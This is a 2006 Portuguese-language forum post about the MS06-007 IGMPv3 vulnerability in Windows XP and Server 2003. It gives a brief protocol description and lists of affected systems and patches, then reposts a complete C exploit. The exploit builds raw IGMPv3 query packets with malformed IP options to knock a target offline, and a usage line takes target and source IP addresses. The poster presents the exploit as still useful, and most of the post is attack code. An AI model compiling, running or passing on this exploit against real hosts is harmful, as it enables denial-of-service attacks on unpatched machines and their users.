IGMP v3 DoS

Started by HadeS, 14 de June , 2006, 09:14:09 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

HadeS

14 de June , 2006, 09:14:09 PM
Primeiro, uma breve descrição do protocolo IGMP: O protocolo de gerenciamento de grupo (IGMP - Internet Group Management Protocol, ou Protocolo de Gerenciamento de Grupos Internet) é usado por hosts para reportar seus participantes de grupos de hosts a roteadores multicast vizinhos. É um protocolo assimétrico e é especificado aqui do ponto de vista de um host, ao invés do de um roteador multicast.

Descrição da falha:
A vulnerabilidade não é muito recente, porém ainda é muito útil. Ela permite a um atacante enviar um pacote IGMP especialmente formatado, levando a uma condição de negação de serviço.

De acordo com o alerta, é possivel diminuir o impacto dessa vulnerabilidade através de boas práticas na criação de regras de firewall. O firewall do Windows deve proteger ainda contra ataques realizados com pacotes IGPM unicast.


Sistemas afetados:

- Microsoft Windows XP Service Pack 1
- Microsoft Windows XP Service Pack 2
- Microsoft Windows XP Professional x64 Edition
- Microsoft Windows Server 2003
- Microsoft Windows Server 2003 Service Pack 1
- Microsoft Windows Server 2003 para sistemas Itanium-based
- Microsoft Windows Server 2003 SP1 para sistemas Itanium-based
- Microsoft Windows Server 2003 x64 Edition


Patches:

- Microsoft Windows XP Service Pack 1
- Microsoft Windows XP Service Pack 2
- Microsoft Windows XP Professional x64 Edition
- Microsoft Windows Server 2003
- Microsoft Windows Server 2003 Service Pack 1
- Microsoft Windows Server 2003 para sistemas Itanium-based
- Microsoft Windows Server 2003 SP1 para sistemas Itanium-based
- Microsoft Windows Server 2003 x64 Edition


Exploit:

Code Select
/*
        IGMP v3 DoS Exploit

        ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
        ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

        by Alexey Sintsov (dookie@inbox.ru)

        Req:
                Administrator rights on system
                Windows Firewall off (for sending RAW packets)

        Affected Products:
                Microsoft Corporation Windows XP All
                Microsoft Corporation Windows Server 2003 All
 */


#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "Ws2_32.lib")

typedef struct iphdr
{
        unsigned char verlen; // IP version & length
        unsigned char tos; // Type of service
        unsigned short total_len; // Total length of the packet
        unsigned short ident; // Unique identifier
        unsigned short frag_and_flags; // Flags
        unsigned char ttl; // Time to live
        unsigned char proto; // Protocol (TCP, UDP etc)
        unsigned short checksum; // IP checksum
        unsigned int sourceIP; // Source IP
        unsigned int destIP; // Destination IP
        unsigned short options[2];

} IPHEADER;

typedef struct igmphdr {
          unsigned char type;
          unsigned char code;
                  unsigned short checksum;
                  unsigned long group;
                  unsigned char ResvSQVR;
                  unsigned char QQIC;
                  unsigned short num;
                  unsigned long addes;

 } IGMPHEADER;

USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum=0;

    while (size > 1) {
        cksum += *buffer++;
        size -= sizeof(USHORT);
    }

    if (size)
        cksum += *(UCHAR*)buffer;

    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >>16);

    return (USHORT)(~cksum);
}

int sendIGMP(char* a, char* b)
{
        unsigned int dst_addr, src_addr;

        IPHEADER ipHeader;
        IGMPHEADER igmpHeader;
        dst_addr=inet_addr (b);
        src_addr=inet_addr (a);

        char szSendBuf[60]={0};
        int rect;

        WSADATA WSAData;
        if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
                return FALSE;

        SOCKET sock;
        if ((sock = WSASocket(AF_INET,SOCK_RAW,
                IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
                printf("Create socket error");
                WSACleanup();
                return FALSE;
        }

        BOOL flag=TRUE;
        if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
                printf("Set options error");
                closesocket(sock);
                WSACleanup();
                return FALSE;
        }

        SOCKADDR_IN ssin;
        memset(&ssin, 0, sizeof(ssin));
        ssin.sin_family=AF_INET;
        ssin.sin_port=htons(99);
        ssin.sin_addr.s_addr=dst_addr;

        ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
        ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));

        ipHeader.ident=htons(0);

        ipHeader.frag_and_flags=0;

        ipHeader.ttl=128;
        ipHeader.proto=IPPROTO_IGMP;

        ipHeader.checksum=0;

        ipHeader.tos=0;

        ipHeader.destIP=dst_addr;
        ipHeader.sourceIP=src_addr;

        //Ip options
        ipHeader.options[0]=htons(0x0000); //bug is here =)
        ipHeader.options[1]=htons(0x0000);

        igmpHeader.type=0x11; //v3 Membership Query
        igmpHeader.code=5;
        igmpHeader.num=htons(1);
        igmpHeader.ResvSQVR=0x0;
        igmpHeader.QQIC=0;
        igmpHeader.group=inet_addr("0.0.0.0");
        igmpHeader.addes=dst_addr;

        igmpHeader.checksum=0;

        memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

        igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

        ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

        rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

        if (rect==SOCKET_ERROR) {
                printf("Send error: <%d>\n",WSAGetLastError());
        closesocket(sock);
                WSACleanup();
                return 0;
        }

        closesocket(sock);
        WSACleanup();

        return 1;
}

main(int argc, char **argv)
{
        if(argc<2)
        {
                printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
                printf("Usage:\n");
                printf("c:\\igmps.exe <target ip> <source ip>\n\n");
                exit(0);
        }

        sendIGMP(argv[2], argv[1]);
        return 0;
}

Fonte do exploit: milw0rm.com


HadeS

Shady

#1
14 de June , 2006, 09:34:24 PM
Ponto pela dedicacao.


Mundus Vult Decipi
Print
Go Up Pages1
User actions